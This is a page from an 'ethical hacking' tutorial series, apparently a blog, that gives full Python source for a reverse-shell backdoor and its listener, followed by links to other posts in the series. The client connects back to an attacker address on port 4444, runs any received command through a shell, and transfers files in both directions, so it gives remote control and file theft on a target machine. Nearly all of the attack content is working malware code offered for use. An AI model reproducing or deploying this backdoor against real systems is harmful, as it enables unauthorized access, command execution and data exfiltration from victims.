File Upload:

  • A file is a series of characters.
  • Uploading a file is the opposite of downloading a file.
  • Therefore to transfer a file we need to:
    • 1. Read the file as a sequence of characters.
    • 2. Send this sequence of characters.
    • 3. Create a new empty file at the destination.
    • 4. Store the transferred sequence of characters in the new file.

Server Side - Listener code

#!/usr/bin/env python

import socket

import json

import base64

class Listener:

    def __init__(self, ip, port):

        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        listener.bind((ip, port))

        listener.listen(0)

        print("[+] Waiting for incoming connections")

        self.connection, address = listener.accept()

        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def execute_remotely(self, command):

        self.reliable_send(command)

        if command[0] == "exit":

            self.connection.close()

            exit()

        return self.reliable_receive()

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Download successful."

    def run(self):

        while True:

            command = input(">> ")

            command = command.split(" ")

            if command[0] == "upload":

                file_content = self.read_file(command[1]).decode()

                command.append(file_content)

            result = self.execute_remotely(command)

            if command[0] == "download":

                result = self.write_file(command[1], result)

            print(result)

my_listener = Listener("10.0.0.43", 4444)

my_listener.run()

Client Side - Backdoor code

#!/usr/bin/env python

import json

import socket

import subprocess

import os

import base64

class Backdoor:

    def __init__(self, ip, port):

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def change_working_directory_to(self, path):

        os.chdir(path)

        return "[+] Changing working directory to " + path

    def execute_system_command(self, command):

        return subprocess.check_output(command, shell=True)

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Upload successful."

    def run(self):

        while True:

            command = self.reliable_receive()

            if command[0] == "exit":

                self.connection.close()

                exit()

            elif command[0] == "cd" and len(command) > 1:

                command_result = self.change_working_directory_to(command[1])

            elif command[0] == "upload":

                command_result = self.write_file(command[1], command[2])

            elif command[0] == "download":

                command_result = self.read_file(command[1]).decode()

            else:

                command_result = self.execute_system_command(command).decode()

            self.reliable_send(command_result)

my_backdoor = Backdoor("10.0.0.43", 4444)

my_backdoor.run()

Upload files from Kali Linux to the target client.

Python Ethical Hacking - BACKDOORS(6)的更多相关文章

  1. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  2. Python Ethical Hacking - BACKDOORS(3)

    BACKDOORS Sockets Problem: TCP is stream-based. Difficult to identify the end of message/batch. Solu ...

  3. Python Ethical Hacking - BACKDOORS(1)

    REVERSE_BACKDOOR Access file system. Execute system commands. Download files. Upload files. Persiste ...

  4. Python Ethical Hacking - BACKDOORS(7)

    Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: ...

  5. Python Ethical Hacking - BACKDOORS(5)

    File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read th ...

  6. Python Ethical Hacking - BACKDOORS(4)

    REVERSE_BACKDOOR - cd command Access file system: cd command changes current working directory. It h ...

  7. Python Ethical Hacking - BACKDOORS(2)

    Refactoring - Creating a Listener Class #!/usr/bin/env python import socket class Listener: def __in ...

  8. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  9. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

随机推荐

  1. Perl入门(一)Perl的基本类型及运算符

    在学习Perl的基础之前,还是希望大家有空去看以下Perl的简介.百度百科 一.Perl的基本类型 Per的基本类型分为两种:数值型和字符串型. 数值型可细分为 整数型.如123. 浮点型.如123. ...

  2. C++ Primer Plus(四)

    完整阅读C++ Primer Plus 系统重新学习C++语言部分,记录重要但易被忽略的,关键但易被遗忘的. 友元.异常和其他 1.抛出异常类时,虽然catch的是一个引用,但是也会产生一次拷贝,因为 ...

  3. day18__文件操作

    一.3 种模式 r: 只读模式,        r+: 读写模式,覆盖开头内容 w: 写模式,全覆盖 (如果是没有的文件则重新创建空文件) a+:  读写模式,从最开头写,覆盖开头内容 (如果是没有的 ...

  4. Dll的多字节和Unicode

    Dll的多字节和Unicode 分类: MFC2013-10-17 13:00 28人阅读 评论(0) 收藏 举报 dll字符集字符集多字节Unicode 我们定义dll的时候会区分: 字符集:使用多 ...

  5. 只需几行 JavaScript 代码,网页瞬间有气质了!

    最近在网上闲逛,发现一个特别好玩的 JavaScript 库,叫 RoughNotation.干嘛用的呢?就是在网页上给文字加标注,比如下划线.方框.高亮文字背景等,不过是手写风格的!截图给大家感受下 ...

  6. C# 模型赋值

    /// <summary> /// 模型赋值 /// </summary> /// <param name="target">目标</pa ...

  7. Bash 脚本编程的一些高级用法

    概述 偶然间发现 man bash 上其实详细讲解了 shell 编程的语法,包括一些很少用却很实用的高级语法.就像发现了宝藏的孩子,兴奋莫名.于是参考man bash,结合自己的理解,整理出了这篇文 ...

  8. JS控制滚动条的位置

    转载▼http://blog.sina.com.cn/s/blog_4481a3460100rwwu.html     JS控制滚动条的位置:window.scrollTo(x,y); 竖向滚动条置顶 ...

  9. Python-数据结构-最全六种排序代码实现

    1.冒泡排序 def bubble_sort(alist): """冒泡排序""" n = len(alist) for j in rang ...

  10. Jmeter(十四) - 从入门到精通 - JMeter定时器 - 下篇(详解教程)

    1.简介 用户实际操作时,并非是连续点击,而是存在很多停顿的情况,例如:用户需要时间阅读文字内容.填表.或者查找正确的链接等.为了模拟用户实际情况,在性能测试中我们需要考虑思考时间.若不认真考虑思考时 ...